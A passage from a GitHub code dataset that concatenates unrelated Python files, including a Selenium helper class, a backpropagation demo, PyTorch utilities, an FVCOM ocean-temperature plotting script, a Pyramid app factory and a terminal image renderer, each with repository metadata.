while(ticker < 11):\r\n bt.send(toConnect, \"Ticker:\" + str(ticker)+'\\0')\r\n # bt.read(toConnect)\r\n delay(1000)\r\n # bt.send(toConnect, 'Hello World!')\r\n # bt.read(toConnect)\r\n ticker = ticker + 1\r\n delay(3000)\r\n bt.disconnect(toConnect)\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"nichinglin/haptic_device_niching","sub_path":"python/BluetoothService.py","file_name":"BluetoothService.py","file_ext":"py","file_size_in_byte":15167,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36870120492","text":"import platform,time, os\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.chrome.options import Options as OptionsChrome\r\nfrom selenium.webdriver.ie.options import Options as OptionsIE\r\nfrom selenium.webdriver.common.desired_capabilities import 
DesiredCapabilities\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver import ActionChains\r\nfrom selenium.webdriver.support.ui import Select\r\nfrom selenium.webdriver.chrome.service import Service\r\n\r\nTIME_OUT_WEB=30\r\n\r\nclass SeleniumLayer: \r\n def __init__(self, log, dir_in, dir_path, dir_out):\r\n self.log = log\r\n self.dir_path = dir_path\r\n self.dir_in = dir_in\r\n self.dir_out = dir_out\r\n log = log\r\n\r\n def iniciar_driver_chrome(self): \r\n ###################### CHROME - DRIVER ######################\r\n # Path Chromedriver\r\n if (platform.system().lower()==\"linux\"): chrome_path='/usr/bin/chromedriver'\r\n elif (platform.system().lower()==\"windows\"): chrome_path=os.path.join(self.dir_path,\"chromedriver.exe\")\r\n\r\n # Capabillities - Options\r\n caps_chrome = DesiredCapabilities().CHROME\r\n caps_chrome[\"pageLoadStrategy\"] = \"normal\"\r\n opts_chrome = OptionsChrome()\r\n opts_chrome.add_argument(\"disable-infobars\")\r\n opts_chrome.add_argument(\"--disable-extensions\")\r\n opts_chrome.add_argument(\"no-sandbox\")\r\n opts_chrome.add_argument(\"disable-gpu\")\r\n opts_chrome.add_argument(\"lang=es\")\r\n opts_chrome.add_argument(\"test-type\")\r\n opts_chrome.add_argument(\"force-renderer-accessibility\")\r\n opts_chrome.add_argument(\"disable-web-security\")\r\n opts_chrome.add_argument(\"disable-extensions\")\r\n opts_chrome.add_argument(\"allow-insecure-localhost\")\r\n opts_chrome.add_argument(\"ignore-ssl-errors=yes\")\r\n opts_chrome.add_argument(\"ignore-certificate-errors\")\r\n opts_chrome.add_argument(\"--log-level=3\")\r\n opts_chrome.add_argument(\"safebrowsing-disable-download-protection\")\r\n prefs = {\"download.default_directory\" : self.dir_in}\r\n opts_chrome.add_experimental_option(\"prefs\",prefs)\r\n #####################################################\r\n\r\n self.log.debug(\"############### Inicio Cargar Chrome ###############\")\r\n inicio=time.time()\r\n self.log.debug (\"Chrome Caps: \")\r\n self.log.debug (caps_chrome)\r\n self.log.debug (\"Chrome Path: \"+ chrome_path)\r\n self.log.debug (\"Chrome Opts: \")\r\n self.log.debug (opts_chrome)\r\n try:\r\n self.log.debug (\"Iniciando WebDriver\")\r\n service = Service(executable_path= chrome_path)\r\n self.driver = webdriver.Chrome(service= service)\r\n self.driver.set_page_load_timeout(TIME_OUT_WEB*2)\r\n \r\n \r\n \r\n except Exception as e:\r\n self.log.error(\"Ocurrio un error con el ChromeDriver\")\r\n raise Exception(e)\r\n \r\n self.log.debug(\"## Tiempo transcurrido: \" + str(time.time()-inicio))\r\n self.log.debug(\"############### Fin Cargar Chrome ###############\")\r\n \r\n\r\n def quit_driver_chrome(self):\r\n self.driver.quit()\r\n\r\n def navegar_url_chrome(self, url):\r\n self.log.debug(\"############### Navegar URL ###############\")\r\n inicio=time.time() \r\n try:\r\n self.log.debug (\"Cargando url: \" + url)\r\n self.driver.get(url)\r\n except Exception as e:\r\n self.log.error(\"Ocurrio un error con el ChromeDriver\")\r\n raise Exception(e)\r\n \r\n\r\n def clear_visible_element_by_id(self, id):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.ID, id))\r\n ).clear()\r\n\r\n def click_visible_element_by_xpath(self, xpath):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.XPATH, xpath))\r\n ).click()\r\n\r\n def send_key_visible_element_by_id(self, id, data):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n 
EC.visibility_of_element_located((By.ID, id))\r\n ).send_keys(data)\r\n \r\n def send_key_visible_element_by_name(self, name, data):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.NAME, name))\r\n ).send_keys(data) \r\n \r\n\r\n def click_visible_element_by_id(self, id):\r\n WebDriverWait(self.driver, TIME_OUT_WEB).until(\r\n EC.visibility_of_element_located((By.ID, id))\r\n ).click()\r\n\r\n def click_located_element_id(self, id):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.ID, id))\r\n ).click()\r\n \r\n def send_key_located_element_by_id(self, id, data):\r\n WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.ID, id))\r\n ).send_keys(data)\r\n\r\n def select_by_value_located_by_id(self, id, value):\r\n Select(WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.ID, id))\r\n )).select_by_value(value)\r\n\r\n def select_by_value_located_by_xpath(self, xpath, value):\r\n Select(WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.XPATH, xpath))\r\n )).select_by_value(value)\r\n\r\n def check_exists_visible_element_by_id(self, id):\r\n try:\r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located((By.ID, id)))\r\n return len(elements)>0\r\n except:\r\n return False\r\n \r\n def check_exists_visible_element_by_xpath(self, xpath):\r\n try:\r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, xpath)))\r\n return len(elements)>0\r\n except:\r\n return False\r\n \r\n def check_exists_visible_element_by_name(self, name):\r\n try:\r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located((By.NAME, name)))\r\n return len(elements)>0\r\n except:\r\n return False\r\n \r\n def check_checkbox_is_selected_by_xpath(self, xpath):\r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_element_located((By.XPATH, xpath)))\r\n return elements.is_selected()\r\n\r\n def get_exists_visible_element_by_xpath(self, xpath): \r\n elements=WebDriverWait(self.driver, 5).until(EC.visibility_of_all_elements_located((By.XPATH, xpath)))\r\n return elements\r\n\r\n def get_text_element(self, element): \r\n return element.text\r\n \r\n def download_imagen_by_xpath(self, xpath, path, element=None):\r\n \r\n if element == None:\r\n with open(path, 'wb') as file:\r\n file.write(WebDriverWait( self.driver, TIME_OUT_WEB).until(\r\n EC.presence_of_element_located((By.XPATH, xpath))\r\n ).screenshot_as_png)\r\n else:\r\n element.find_element(By.XPATH,xpath).screenshot(path)\r\n \r\n time.sleep(0.3)\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"renatolzr/RPAChallengeNYTime","sub_path":"selenium_util.py","file_name":"selenium_util.py","file_ext":"py","file_size_in_byte":7429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19266053151","text":"'''This script uses scikit-learn's blobs dataset to test the backprop code'''\n\nimport numpy as np\nfrom sklearn.datasets import make_blobs\n# import matplotlib.pyplot as plt\n\nX = np.array([1, 0])\ny = np.array([1])\n\nX, y = make_blobs(centers=2, random_state=42)\n# X, y = make_classification(n_features=2, n_redundant=0, n_informative=1,\n# n_clusters_per_class=1)\nprint(X.shape, y.shape)\n\n\n# plt.plot(X[:,0], X[:,1], 'bo')\n# plt.show()\n\n\ndef sigmoid(x):\n \"\"\"Calculates the sigmoid function\"\"\"\n return 
1/(1+np.exp(-x))\n\n\ndef initialize_weights(n):\n \"\"\"Returns random weights\"\"\"\n # could try normal biases\n np.random.seed(42)\n weights = np.random.rand(n)*0.01\n weights = weights.reshape((3, 3))\n return weights\n\n\ndef loss(ytrue, ypred):\n \"\"\"returns a scalar that tells how far we are off\"\"\"\n return (ytrue-ypred)**2\n\n\ndef sigmoid_derivative(x):\n \"\"\"returns the values of sig'(x)\"\"\"\n sig = sigmoid(x)\n return sig*(1-sig)\n\n\ndef feed_forward(x, w, activation):\n \"\"\"Runs data through the neural network and returns a prediction\"\"\"\n # hidden layer\n in_data = np.array([x[:, 0], x[:, 1], np.ones(x.shape[0])])\n neuron1 = np.dot(in_data.T, w[0])\n n1 = activation(neuron1)\n neuron2 = np.dot(in_data.T, w[1])\n n2 = activation(neuron2)\n\n # output layer\n in2 = np.array([n1, n2, 1])\n output = np.dot(in2, w[2])\n\n ypred = activation(output)\n return (neuron1, neuron2, n1, n2, output, ypred)\n\n\ndef backprop(x, y, w, learning_rate, n_iter):\n \"\"\"Return optimized weights for the network\"\"\"\n for i in range(n_iter):\n # Calculate the output of both layers\n neuron1, neuron2, n1, n2, out, ypred = feed_forward(X, w, sigmoid)\n\n # Calculate the loss (difference of predicted and correct output)\n error = loss(y, ypred)\n\n # Modify each weight of the output layer by:\n # sig'(output) * loss * hidden_output\n oldw = w.copy()\n w[2, 0] -= sum(sigmoid_derivative(out)*n1*(ypred-y))*learning_rate\n w[2, 1] -= sum(sigmoid_derivative(out)*n2*(ypred-y))*learning_rate\n w[2, 2] -= sum(sigmoid_derivative(out) * 1*(ypred-y))*learning_rate\n\n # Calculate hidden_loss as sig'(output) * output_weight for each\n # hidden neuron\n # Modify each weight in the hidden layer by:\n # -sig'(hidden_output) * hidden_loss * input features\n # PROBLEM: doesn't backpropagate to hidden layer\n w[0, 0] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 0]\n * sigmoid_derivative(neuron1)*X[:, 0])*learning_rate\n w[0, 1] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 0]\n * sigmoid_derivative(neuron1)*X[:, 1])*learning_rate\n w[0, 2] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 0]\n * sigmoid_derivative(neuron1))*learning_rate\n w[1, 0] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 1]\n * sigmoid_derivative(neuron2)*X[:, 0])*learning_rate\n w[1, 1] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 1]\n * sigmoid_derivative(neuron2)*X[:, 1])*learning_rate\n w[1, 2] -= sum(sigmoid_derivative(out)*(ypred-y)*oldw[2, 1]\n * sigmoid_derivative(neuron2))*learning_rate\n\n _, _, _, _, _, ypred = feed_forward(X, w, sigmoid)\n print(\"loss: \", sum(np.abs(loss(y, ypred))))\n\n return w\n\n\nif __name__ == '__main__':\n\n w = initialize_weights(9)\n w = backprop(X, y, w, 0.01, 1000)\n\n print(\"-\" * 40)\n print(\"FINAL RESULT:\")\n #print(\"X: \", X)\n #print(\"w: \", w)\n\n _, _, _, _, _, ypred = feed_forward(X, w, sigmoid)\n yp = np.round(ypred)\n # print(\"ypred: \", yp)\n\n acc = 1 - sum(np.abs(yp - y)) / 100\n print(acc)\n\n error1 = loss(y, ypred)\n print(\"loss: \", sum(np.abs(error1)))\n","repo_name":"Lilliangreve/Backpropagation","sub_path":"backprop_blobs.py","file_name":"backprop_blobs.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4102496183","text":"import json\nimport urllib\nimport torch\nimport torch.nn as nn\nimport pandas as pd\nfrom pathlib import Path\nfrom itertools import repeat\nfrom collections import OrderedDict\n\n\nfrom typing import Tuple, Union, Callable, 
Optional, Any\n\n\ndef get_output_shape(model: nn.Module, input_shape: Tuple[int, int, int, int]) -> Tuple[int, int, int, int]:\n # Figure out the output shape of an nn.Module.\n # taken from: https://stackoverflow.com/a/62197038\n return model(torch.rand(*(input_shape))).data.shape\n\n\ndef get_url_filename(url: str) -> str:\n req = urllib.request.Request(url, method=\"HEAD\")\n req_info = urllib.request.urlopen(req).info()\n\n # Detect filename\n return req_info.get_filename()\n\n\ndef ensure_dir(dirname):\n dirname = Path(dirname)\n if not dirname.is_dir():\n dirname.mkdir(parents=True, exist_ok=False)\n\n\ndef read_json(fname):\n fname = Path(fname)\n with fname.open('rt') as handle:\n return json.load(handle, object_hook=OrderedDict)\n\n\ndef write_json(content, fname):\n fname = Path(fname)\n with fname.open('wt') as handle:\n json.dump(content, handle, indent=4, sort_keys=False)\n\n\ndef inf_loop(data_loader):\n ''' wrapper function for endless data loader. '''\n for loader in repeat(data_loader):\n yield from loader\n\n\ndef prepare_device(n_gpu_use):\n \"\"\"\n setup GPU device if available. get gpu device indices which are used for DataParallel\n \"\"\"\n n_gpu = torch.cuda.device_count()\n if n_gpu_use > 0 and n_gpu == 0:\n print(\"Warning: There\\'s no GPU available on this machine,\"\n \"training will be performed on CPU.\")\n n_gpu_use = 0\n if n_gpu_use > n_gpu:\n print(f\"Warning: The number of GPU\\'s configured to use is {n_gpu_use}, but only {n_gpu} are \"\n \"available on this machine.\")\n n_gpu_use = n_gpu\n device = torch.device('cuda:0' if n_gpu_use > 0 else 'cpu')\n list_ids = list(range(n_gpu_use))\n return device, list_ids\n\n\nclass MetricTracker:\n def __init__(self, *keys, writer=None):\n self.writer = writer\n self._data = pd.DataFrame(\n index=keys, columns=['total', 'counts', 'average'])\n self.reset()\n\n def reset(self):\n for col in self._data.columns:\n self._data[col].values[:] = 0\n\n def update(self, key, value, n=1):\n if self.writer is not None:\n self.writer.add_scalar(key, value)\n self._data.total[key] += value * n\n self._data.counts[key] += n\n self._data.average[key] = self._data.total[key] / \\\n self._data.counts[key]\n\n def avg(self, key):\n return self._data.average[key]\n\n def result(self):\n return dict(self._data.average)\n","repo_name":"piptouque/atiam_audio_network_hacking","sub_path":"code/utils/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11562522480","text":"# https://www.acmicpc.net/problem/1157\n\n\ns = input().upper()\nl1 = list()\nl2 = list()\n\n#알파벳 갯수 세기\nfor i in range(ord(\"A\"),ord(\"Z\")+1):\n l1.append(s.count(chr(i)))\n\n# 갯수 중 가장 큰 수\nmax = max(l1)\n\n# 가장 큰 수의 index를 l2에 넣기\nfor i in range(len(l1)):\n if l1[i] == max :\n l2.append(i)\n\n# 조건에 맞게 출력\nif len(l2) == 1 :\n ascii_code=ord('A')+l2[0]\n print(chr(ascii_code))\nelse :\n print(\"?\")\n","repo_name":"Overclock7/Baekjoon","sub_path":"Python/1157.py","file_name":"1157.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4458361664","text":"NUM_TESTS = 140\nNUM_EVALS = 55\n#NUM_CLASSES = 134\n#NUM_CLASSES = 47\nNUM_CLASSES = 11\nNUM_EPOCHS = 10\nNUM_MINI_BATCH = 64\nEMBEDDING_SIZE = 128\nNUM_FILTERS = 128\nFILTER_SIZES = [ 3, 4, 5 ]\nL2_LAMBDA = 0.0001\nEVALUATE_EVERY = 100\nCHECKPOINTS_EVERY = 1000\n\nSUMMARY_LOG_DIR = 
'summary_log'\nCHECKPOINTS_DIR = 'checkpoint'\nCHECKPOINTS_FILE = CHECKPOINTS_DIR + '/cnn_' + str(NUM_CLASSES) + '.h5'\n\nOUTPUT_FILE = CHECKPOINTS_DIR + '/cnn_output_' + str(NUM_CLASSES) + '.csv'\n\nRAW_FILE = 'data/raw_' + str(NUM_CLASSES) + '.txt'\nDATA_FILE = 'data/data.npy'\nLABEL_FILE = 'data/labels.npy'\nDICTIONARY_FILE = 'data/dictionaries.npy'\n\nEVAL_DATA_FILE = 'data/data.npy'\nEVAL_LABEL_FILE = 'data/labels.npy'","repo_name":"coolerking/ai_example","sub_path":"keras_classifier/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20956615926","text":"from cx_Freeze import setup, Executable\n\nbuild_exe_options = {\n \"packages\": [\"pygame\", \"OpenGL\", \"random\", \"requests\", \"threading\", \"datetime\", \"itertools\", \"moviepy\", \"websockets\"],\n \"include_files\": [\"loop.wav\", \"pong.wav\", \"ping.wav\", \"surf.wav\", \"drop.wav\", \"warp.wav\", \"oof.wav\", \"keywords.txt\"],\n \"excludes\": []\n}\n\nsetup(\n name=\"MUSICUBE\",\n version=\"0.1\",\n options={\"build_exe\": build_exe_options},\n executables=[Executable(\"MUSICUBE_2045.py\")]\n)\n","repo_name":"Mind-Interfaces/HACKATHON","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"72714747363","text":"\n\"\"\"\nCreated on 5 Sept 2019\nplot horizontal slice of FVCOM\n@author: JiM\nModified in Feb 2021 to work examine Dec 2020 MAB event\n\"\"\"\n# routine to plot FVCOM surface temps\n# taken from Rich's blog at\n# http://rsignell-usgs.github.io/blog/blog/2014/01/08/fvcom/\n\nfrom pylab import *\nimport matplotlib.tri as Tri\nimport netCDF4\nfrom datetime import datetime as dt\nimport pandas as pd\n\n\n############################\n# HARDCODES\nmode='Forecasts' # or Hindcasts\n#run='FVCOM_OCEAN_MASSBAY' # only needed in Forecasts case\nrun='GOM3'\ndtime=dt(2022,6,7,6,0,0)\narea='GS'#'inside_CCBAY'\nlayer='surface' # or bottom\nlevels=arange(7*1.8+32,26*1.8+32,.5) # min,max,int in degC changed to degF\nlevels=arange(45,78,1.0)\nmaxvel = 1.0 # for quiver legend\nsubsample = 50\ndef getgbox(area):\n # gets geographic box based on area\n if area=='SNE':\n gbox=[-70.,-64.,39.,42.] # for SNE\n elif area=='GBANK':\n gbox=[-70.,-64.,39.,42.] # for SNE\n elif area=='GS': \n gbox=[-71.,-65.,38.,42.] # for Gulf Stream\n elif area=='NorthShore':\n gbox=[-71.,-70.,42.,43.] 
# for north shore\n elif area=='CCBAY':\n gbox=[-70.75,-69.8,41.5,42.23] # CCBAY\n elif area=='inside_CCBAY':\n gbox=[-70.75,-70.,41.7,42.23] # CCBAY \n return gbox\n\n## DAP Data URL\nif mode=='Forecasts':\n\turl = 'http://www.smast.umassd.edu:8080/thredds/dodsC/FVCOM/NECOFS/Forecasts/NECOFS_'+run+'_FORECAST.nc'\nelse:\n\turl='http://www.smast.umassd.edu:8080/thredds/dodsC/fvcom/hindcasts/30yr_gom3'\n\t\nnc = netCDF4.Dataset(url).variables\n\n#start = dt.datetime.utcnow() + dt.timedelta(hours=18)\ntime_var = nc['time']\nitime = netCDF4.date2index(dtime,time_var,select='nearest')\n\n# Get lon,lat coordinates for nodes (depth)\nlat = nc['lat'][:]\nlon = nc['lon'][:]\n# Get lon,lat coordinates for cell centers (depth)\nlatc = nc['latc'][:]\nlonc = nc['lonc'][:]\nh=nc['h'][:]\n# Get Connectivity array\nnv = nc['nv'][:].T - 1 \n# Get depth\n#h = nc['h'][:] # depth\n\ndtime = netCDF4.num2date(time_var[itime],time_var.units)\ndaystr = dtime.strftime('%Y-%b-%d %H:%M')\n#print(daystr)\n\ntri = Tri.Triangulation(lon,lat, triangles=nv)\nif layer=='surface':\n\tilayer = 0 #surface\nelse:\n\tilayer =-1 #bottom\nsst = nc['temp'][itime, ilayer, :]*1.8+32\n#u=nc['ua'][itime,:]# vertically averaged\n#v=nc['va'][itime,:]\nu=nc['u'][itime,ilayer,:]# \nv=nc['v'][itime,ilayer,:]\n# define contour levels if blank\nif len(levels)==0:\n\tlevels=arange(int(min(sst)),int(max(sst)+1),1)\nax = getgbox(area)# returns a geographic box like [-70.7, -70.6, 41.48, 41.55]\n\n\n# find velocity points in bounding box\nidv = argwhere((lonc >= ax[0]) & (lonc <= ax[1]) & (latc >= ax[2]) & (latc <= ax[3]))\nidv=idv[0::subsample]\nfigure(figsize=(12,8))\nsubplot(111,aspect=(1.0/cos(mean(lat)*pi/180.0)))\n#tricontourf(tri, sst,levels=levels,shading='faceted',cmap=plt.cm.gist_earth)\ntricontourf(tri, sst,levels=levels,shading='faceted',cmap=plt.cm.jet)\naxis(ax)\ngca().patch.set_facecolor('0.5')\ncbar=colorbar()\ncbar.set_label('SST (degF)', rotation=-90)\nQ = quiver(lonc[idv],latc[idv],u[idv],v[idv],scale=20)\nmaxstr='%3.1f m/s' % maxvel\nqk = quiverkey(Q,0.92,0.08,maxvel,maxstr,labelpos='W')\ncoastfilename='c:/users/james.manning/Downloads/basemaps/capecod_coastline_detail.csv'\ndf=pd.read_csv(coastfilename)\nplt.plot(df.lon,df.lat,'k.',markersize=1)\n#plt.tricontour(Grid['lon'],Grid['lat'],Grid['h'],[200.],colors='purple')\nplt.tricontour(lon,lat,h,[200.],colors='purple')\ntitle('FVCOM '+layer+' %s ' % (daystr[0:12])+' '+mode)\n#savefig('/net/pubweb_html/epd/ocean/MainPage/turtle/ccbay/FVCOM_sst_'+daystr[0:12]+'+.png')\nsavefig('FVCOM_sst_'+area+'_'+daystr[0:12]+'+.png')\n\n\n\n","repo_name":"jamespatrickmanning/fvcom_viz","sub_path":"plot_fvcom_surf_temp.py","file_name":"plot_fvcom_surf_temp.py","file_ext":"py","file_size_in_byte":3581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32385831369","text":"import sys\n\ninput = sys.stdin.readline\n\n\ndef is_pelindrome(string):\n for i in range(len(string) // 2):\n if string[i] != string[len(string) - 1 - i]:\n return False\n return True\n\n\nt = int(input())\n\nfor _ in range(t):\n n = int(input())\n num = int(input())\n x1 = int(\"1\" + \"0\" * (n - 1) + \"1\")\n x2 = int(\"1\" * (n + 1))\n\n if len(str(x1 - num)) == n:\n print(str(x1 - num))\n continue\n\n if len(str(x2 - num)) == n:\n print(str(x2 - num))\n 
continue\n","repo_name":"seongjaee/algorithm-study","sub_path":"Codes/Codeforces/1700B_PalindromicNumbers.py","file_name":"1700B_PalindromicNumbers.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33907448701","text":"from builtins import str\nfrom builtins import object\nfrom qgis.core import QgsFeature\nfrom qgis.PyQt.QtWidgets import (QDialog, QComboBox)\nfrom .ui_distromap import Ui_DistroMap\n\n# Add a method to QComboBox to get the current item data\ndef currentItemData(self):\n return str(self.itemData(self.currentIndex()))\n\nQComboBox.currentItemData = currentItemData\n\nclass Features(object):\n# Class adapted from version in Sextante QGisLayers driver (by Victor Olaya)\n\n def __init__(self, layer):\n self.layer = layer\n self.iter = layer.getFeatures()\n self.selection = False;\n self.selected = layer.selectedFeatures()\n if len(self.selected) > 0:\n self.selection = True\n self.idx = 0;\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.selection:\n if self.idx < len(self.selected):\n feature = self.selected[self.idx]\n self.idx += 1\n return feature\n else:\n raise StopIteration()\n else:\n if self.iter.isClosed():\n raise StopIteration()\n f = QgsFeature()\n if self.iter.nextFeature(f):\n return f\n else:\n self.iter.close()\n raise StopIteration()\n\n def __len__(self):\n if self.selection:\n return int(self.layer.selectedFeatureCount())\n else:\n return int(self.layer.featureCount())\n\n\nclass DistroMapDialog(QDialog):\n def __init__(self):\n QDialog.__init__(self)\n # Set up the user interface from Designer.\n self.ui = Ui_DistroMap()\n self.ui.setupUi(self)\n","repo_name":"rudivs/DistroMap","sub_path":"distromapdialog.py","file_name":"distromapdialog.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"39568319614","text":"\"\"\"\nCP1404/CP5632 Practical - Project class\nEstimate - 2 hours\n\"\"\"\nimport datetime\n\n\nclass Project:\n \"\"\"Represent a project\"\"\"\n\n def __init__(self, name, start_date, priority, cost_estimate, completion_percentage):\n \"\"\"Initialise a project\"\"\"\n self.name = name\n self.start_date = start_date\n self.priority = priority\n self.cost_estimate = cost_estimate\n self.completion_percentage = completion_percentage\n\n def __str__(self):\n \"\"\"Return formatted project as string\"\"\"\n return f\"{self.name}, start: {datetime.datetime.strftime(self.start_date, '%d/%m/%Y')},\" \\\n f\" priority {self.priority}, estimate: ${self.cost_estimate:.2f}, \" \\\n f\"completion: {self.completion_percentage}%\"\n\n def __repr__(self):\n \"\"\"return list objects in string format\"\"\"\n return str(self)\n\n def is_complete(self):\n \"\"\"Return true or False if completion percentage is 100 or not\"\"\"\n return self.completion_percentage == 100\n\n def __lt__(self, other):\n \"\"\"Return True/False if one value is less than other or not.\"\"\"\n return self.priority < other.priority\n\n\ndef run_tests():\n \"\"\"Test project class.\"\"\"\n p1 = Project(name=\"Build Car Park\", start_date=datetime.datetime.strptime(\"9/1/2021\", '%d/%m/%Y'), priority=2,\n cost_estimate=600000.0,\n completion_percentage=95)\n p2 = Project(name=\"Test\", start_date=datetime.datetime.strptime(\"9/2/2021\", '%d/%m/%Y'), priority=3,\n cost_estimate=700.0,\n completion_percentage=100)\n print(p1)\n print(p1.is_complete())\n print(p2)\n 
print(p1.is_complete())\n print(p1 < p2)\n\n\nif __name__ == '__main__':\n run_tests()\n","repo_name":"RashmiPokuru/cp1404practicals","sub_path":"prac_07/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27610406251","text":"from pyramid.config import Configurator\nimport pymongo\nimport pika\n\n\ndef main_api(global_config, **settings):\n \"\"\"\n This function returns a Pyramid WSGI application.\n \"\"\"\n config = Configurator(settings=settings)\n\n config.registry.db = pymongo.MongoClient(settings['mongo.uri'])['ebretail']\n\n # Open a connection to the message broker\n amqpConnection = pika.BlockingConnection(pika.ConnectionParameters(settings['amqp.uri']))\n def getMessagingChannel():\n nonlocal amqpConnection\n try:\n return amqpConnection.channel()\n except pika.exceptions.ConnectionClosed:\n amqpConnection = pika.BlockingConnection(pika.ConnectionParameters(settings['amqp.uri']))\n return getMessagingChannel()\n\n config.registry.getMessagingChannel = getMessagingChannel\n\n # Add our custom file renderer, used for endpoints that serve files from Mongos GridFS\n config.add_renderer('file', 'ebretail.components.file_renderer.FileRenderer')\n config.add_renderer('bson', 'ebretail.components.bson_renderer.BSONRenderer')\n\n config.add_static_view('static', 'static', cache_max_age=3600)\n config.add_route('collect_images', '/collect_images')\n config.add_route('register_collector', '/register_collector')\n\n\n config.add_route('home', '/')\n config.scan('ebretail.endpoints')\n\n return config.make_wsgi_app()\n\n\ndef image_processor_microservice(global_config, **settings):\n \"\"\"\n This function returns a Pyramid WSGI application for the\n image processor microservice\n \"\"\"\n config = Configurator(settings=settings)\n\n # Open a connection to the message broker\n config.registry.amqpConnection = pika.BlockingConnection(pika.ConnectionParameters(settings['amqp.uri']))\n\n # Add our custom file renderer, used for endpoints that serve files from Mongos GridFS\n config.add_renderer('file', 'ebretail.components.file_renderer.FileRenderer')\n config.add_renderer('bson', 'ebretail.components.bson_renderer.BSONRenderer')\n\n config.add_route('process_image', '/process_image')\n config.scan('ebretail.processor_endpoints')\n return config.make_wsgi_app()\n\n\n__all__ = [\"main_api\", \"image_processor_microservice\"]","repo_name":"benbricksanalytics/eb-retail","sub_path":"server/ebretail/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"25230557802","text":"#/usr/bin/python3\nimport io\nimport requests\nfrom PIL import Image\nimport numpy as np\nfrom matplotlib import pylab as plt\narr = [0x00, 0x5F, 0x87, 0xAF, 0xD7, 0xFF]\n\n\ndef get_place(num):\n if num == 0xff:\n return 5\n for index, i in enumerate(arr):\n if i > num:\n return index - (1 if num - arr[index - 1] <= i - num else 0)\n\n\ndef color(num):\n if num%0xa0a0a == 0x80808:\n return 232 + int((num - 0x080808) / 0xa0a0a)\n pos = 16\n for i in range(3):\n pos += get_place(num & 0xff) * 6**i\n num >>= 8\n return pos\n\n\ndef mkcl(num):\n return \"\u001B[38;5;{}m\".format(num)\n\n\ndef mkclb(num):\n return \"\u001B[48;5;{}m\".format(num)\n\n\ndef resize(img, to_size):\n size = img.size\n if size[0] < size[1]: # vertical\n ratio = size[1] / to_size\n img = 
img.resize((int(size[0] // ratio), to_size))\n else: # oblong\n ratio = size[0] / to_size\n img = img.resize((to_size, int(size[1] // ratio)))\n return img\n\n\ndef load_img(url):\n return Image.open(io.BytesIO(requests.get(url).content))\n\n\ndef create_data(img, size=None):\n img = load_img(img) if type(img) == str else img\n\n if size == None: img = np.array(img)\n else: img = np.array(resize(img, int(size)))\n\n result = \"\"\n for line in [[(color[0] << 16) | (color[1] << 8) | color[2] for color in column] for column in img]:\n for i in line:\n result += mkcl(color(i)) + \"##\"\n result += \"\\n\"\n return result\n\n\nif __name__ == \"__main__\":\n import sys\n def display(filename, url, size=180):\n print(create_data(url, size))\n\n display(*sys.argv)\n","repo_name":"ctare/cuiImage","sub_path":"cuiImage.py","file_name":"cuiImage.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"10271214946","text":"#user define exception\r\n#AS A DEVELOPER AS PER 